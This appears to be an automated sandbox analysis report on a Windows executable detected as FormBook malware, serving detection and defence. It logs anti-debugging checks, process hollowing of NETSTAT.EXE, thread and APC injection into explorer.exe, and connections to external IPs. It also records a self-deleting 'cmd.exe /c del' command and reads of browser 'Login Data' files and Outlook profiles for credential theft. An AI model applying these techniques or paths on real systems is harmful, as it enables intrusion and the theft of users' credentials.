Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 1_2_00ADAE73
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 1_2_00AC7E41
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7AE44 mov eax, dword ptr fs:[00000030h] 1_2_00B7AE44
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7AE44 mov eax, dword ptr fs:[00000030h] 1_2_00B7AE44
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h] 1_2_00B37794
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h] 1_2_00B37794
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h] 1_2_00B37794
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC8794 mov eax, dword ptr fs:[00000030h] 1_2_00AC8794
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF37F5 mov eax, dword ptr fs:[00000030h] 1_2_00AF37F5
Enables debug privileges
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00465ED0 KiUserExceptionDispatcher,7344B410,GetSystemMetrics,GetSystemMetrics,ExitProcess,RtlAddVectoredExceptionHandler, 0_2_00465ED0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Memory protected: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 34.196.13.28 80
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.64 80
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.198 80
Source: C:\Windows\explorer.exe Network Connect: 194.146.87.218 80
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe Network Connect: 155.159.203.193 80
Source: C:\Windows\explorer.exe Network Connect: 64.98.145.30 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 80.78.22.40 80
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section loaded: unknown target: C:\Users\user\Desktop\mp0nMsMroT.exe protection: execute and read and write
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Thread register set: target process: 3384
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3384
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 60000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Process created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
Source: explorer.exe, 00000002.00000000.188009008.00000000012B0000.00000002.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.452489924.0000000004260000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.188009008.00000000012B0000.00000002.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.452489924.0000000004260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.188009008.00000000012B0000.00000002.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.452489924.0000000004260000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.187656767.0000000000DB8000.00000004.00000020.sdmp Binary or memory string: Progmanesa
Source: explorer.exe, 00000002.00000000.188009008.00000000012B0000.00000002.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.452489924.0000000004260000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.203152657.0000000007E03000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndk

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_00405250
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA,GetACP, 0_2_0040C4C0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA, 0_2_0040AE68
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA, 0_2_0040AE1C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_0040535C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA, 0_2_00405B7A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: GetLocaleInfoA, 0_2_00405B7C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0040991C GetLocalTime, 0_2_0040991C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_004482AC GetVersion, 0_2_004482AC

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE